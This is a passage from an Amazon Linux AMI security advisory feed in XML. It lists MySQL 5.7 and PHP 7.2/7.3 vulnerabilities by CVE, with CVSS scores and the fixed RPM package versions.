</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19956" title="" id="CVE-2019-19956" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20388" title="" id="CVE-2019-20388" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7595" title="" id="CVE-2020-7595" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.41.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.4.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1439</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1439: medium priority package update for mysql57</title><issued date="2020-10-26 18:14:00" /><updated date="2020-10-27 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14576:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1865955: CVE-2020-14576 mysql: Server: UDF unspecified vulnerability (CPU Jul 2020)
CVE-2020-14559:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Information Schema). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1865951: CVE-2020-14559 mysql: Server: Information Schema unspecified vulnerability (CPU Jul 2020)
CVE-2020-14553:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1865950: CVE-2020-14553 mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2020)
CVE-2020-14550:
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1865949: CVE-2020-14550 mysql: C API unspecified vulnerability (CPU Jul 2020)
CVE-2020-14547:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1865948: CVE-2020-14547 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2020)
CVE-2020-14540:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1865947: CVE-2020-14540 mysql: Server: DML unspecified vulnerability (CPU Jul 2020)
CVE-2020-14539:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1865945: CVE-2020-14539 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14539" title="" id="CVE-2020-14539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14540" title="" id="CVE-2020-14540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14547" title="" id="CVE-2020-14547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14550" title="" id="CVE-2020-14550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14553" title="" id="CVE-2020-14553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14559" title="" id="CVE-2020-14559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14576" title="" id="CVE-2020-14576" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-libs" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.31" release="1.16.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-server-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.31" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-server-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.31-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1440</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1440: medium priority package update for php72 php73</title><issued date="2020-10-26 18:16:00" /><updated date="2020-10-27 21:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7070:
In PHP versions 7.2.x below 7.2.34, 7.3.x below 7.3.23 and 7.4.x below 7.4.11, when PHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host being confused with cookies whose names decode to such a prefix, thus allowing an attacker to forge a cookie which is supposed to be secure. See also CVE-2020-8184 for more information.
1885738: CVE-2020-7070 php: PHP parses encoded cookie names so malicious `__Host-` cookies can be sent
CVE-2020-7069:
In PHP versions 7.2.x below 7.2.34, 7.3.x below 7.3.23 and 7.4.x below 7.4.11, when AES-CCM mode is used with the openssl_encrypt() function and a 12-byte IV, only the first 7 bytes of the IV are actually used. This can lead to both decreased security and incorrect encrypted data.
1885735: CVE-2020-7069 php: wrong ciphertext/tag in AES-CCM encryption for a 12 bytes IV
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7069" title="" id="CVE-2020-7069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7070" title="" id="CVE-2020-7070" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-bcmath" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.34" release="1.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-intl-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package 
name="php72-mysqlnd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.34" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-devel-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.34" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.34" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-common-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.23" release="1.29.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-mbstring-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-imap" 
version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.23" release="1.29.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-cli-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.23" release="1.29.amzn1" epoch="0" 